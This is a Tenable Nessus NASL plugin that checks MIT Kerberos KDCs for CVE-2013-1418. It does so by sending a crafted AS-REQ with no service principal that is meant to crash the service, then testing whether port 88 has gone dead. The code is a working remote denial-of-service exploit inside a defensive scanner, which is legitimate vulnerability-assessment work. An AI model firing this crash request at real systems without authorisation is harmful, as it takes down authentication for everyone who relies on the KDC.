MIT Kerberos 5 setup_server_realm() Remote DoS

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(70941);
  script_version("1.5");
  script_cvs_date("Date: 2018/07/14  1:59:35");

  script_cve_id("CVE-2013-1418");
  script_bugtraq_id(63555);

  script_name(english:"MIT Kerberos 5 setup_server_realm() Remote DoS");
  script_summary(english:"Tries to crash krb5kdc");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A single sign-on service is affected by a denial of service
vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The Kerberos service running on the remote host is affected by a remote
denial of service (DoS) vulnerability.  Attackers can exploit this issue
to crash the affected KDC service, resulting in DoS conditions."
  );
  script_set_attribute(attribute:"see_also", value:"http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757");
  script_set_attribute(attribute:"solution", value:"Update the affected krb5 package.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"patch_publication_date", value:"2013/11/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos:5");

  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
  script_family(english:"General");

  script_dependencies("find_service.nasl");
  script_require_ports("Services/krbtgt", 88);

  exit(0);
}

include("audit.inc");
include("kerberos_func.inc");
include("global_settings.inc");
include("misc_func.inc");

# Kerberos is detected by find_service.nasl; but seems only for MIT Kerberos
port = get_service(svc:'krbtgt', default:88, exit_on_fail: TRUE);
if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);

soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');

padata = NULL;
realm = 'REALM_' + SCRIPT_NAME;
principal = 'principal_' + SCRIPT_NAME;

# AS-REQ without service principal specified
req_body = der_encode_kdc_req_body (principal:principal, realm:realm, service:NULL);
encoded = der_encode_kdcreq (pvno:5, msg_type:0x0A, list:padata, req_body:req_body);
req = der_encode (tag:0x6A, data:encoded);

# Attempt to crash the KDC
req = raw_dword(d:strlen(req) & 0x7fffffff, be: TRUE) + req;
send(socket:soc, data: req);
close(soc);

# Wait a bit
sleep(1);

# Vulnerable KDC should be dead by now
ret = service_is_dead(port:port);
if      (ret == 0 ) audit(AUDIT_LISTEN_NOT_VULN, 'KDC', port);
else if (ret == 1 ) security_warning(port:port);
else if (ret == -1) exit(0, 'An attempt to connect to remote TCP port ' + port +' timed out.');